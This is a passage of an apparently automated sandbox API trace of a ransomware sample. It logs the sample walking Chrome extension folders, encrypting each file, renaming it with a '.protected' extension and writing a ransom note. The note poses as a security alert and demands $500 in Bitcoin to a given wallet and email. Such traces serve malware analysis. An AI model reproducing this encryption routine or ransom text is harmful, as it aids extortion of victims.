(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.843] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.843] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.843] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.843] CloseHandle (hObject=0x164) returned 1 [0078.843] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.843] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0078.843] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0078.843] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0078.843] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0078.843] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0078.843] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned 144 [0078.843] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0078.843] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0078.843] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*") returned 146 [0078.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.844] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.844] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.844] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.844] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.844] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.844] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\.") returned 146 [0078.844] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.844] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.844] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.844] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.844] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.844] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.844] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.844] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\..") returned 147 [0078.844] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.844] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.844] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.844] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.844] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.844] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.844] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.844] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.844] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0078.844] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.844] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.844] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.844] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.844] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0078.844] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.845] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0078.845] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.845] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0078.845] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.845] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0078.846] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.846] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0078.846] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.846] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.846] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.846] CloseHandle (hObject=0x168) returned 1 [0078.846] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.protected") returned 168 [0078.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0078.847] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.847] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.847] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 162 [0078.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.847] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.847] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.848] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.848] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.848] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.848] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.848] CloseHandle (hObject=0x164) returned 1 [0078.848] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0078.848] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0078.848] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\RESTORE_FILES.txt") returned 156 [0078.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.848] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.848] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0078.849] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.849] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0078.849] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.849] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0078.849] CloseHandle (hObject=0x160) returned 1 [0078.849] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.849] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0078.849] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0078.849] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0078.849] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0078.849] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0078.849] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned 139 [0078.849] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0078.849] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0078.849] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*") returned 141 [0078.849] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0078.850] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.850] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.850] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.850] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.850] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.850] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\.") returned 141 [0078.850] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.850] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.850] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.850] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.850] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.850] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.850] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.850] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\..") returned 142 [0078.850] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.850] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.850] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.850] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Windows") returned -1 [0078.850] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files") returned -1 [0078.850] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files (x86)") returned -1 [0078.850] lstrcmpiW (lpString1="computed_hashes.json", lpString2="$Recycle.bin") returned 1 [0078.850] lstrcmpiW (lpString1="computed_hashes.json", lpString2="System Volume Information") returned -1 [0078.850] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0078.850] StrStrIW (lpFirst="computed_hashes.json", lpSrch=".protected") returned 0x0 [0078.850] lstrcmpW (lpString1="computed_hashes.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.850] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0078.850] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0078.850] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0078.851] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0078.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0078.851] StrStrW (lpFirst="computed_hashes.json", lpSrch=".rar") returned 0x0 [0078.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0078.851] StrStrW (lpFirst="computed_hashes.json", lpSrch=".zip") returned 0x0 [0078.851] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0078.851] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffffea0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.851] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0078.851] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.852] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, 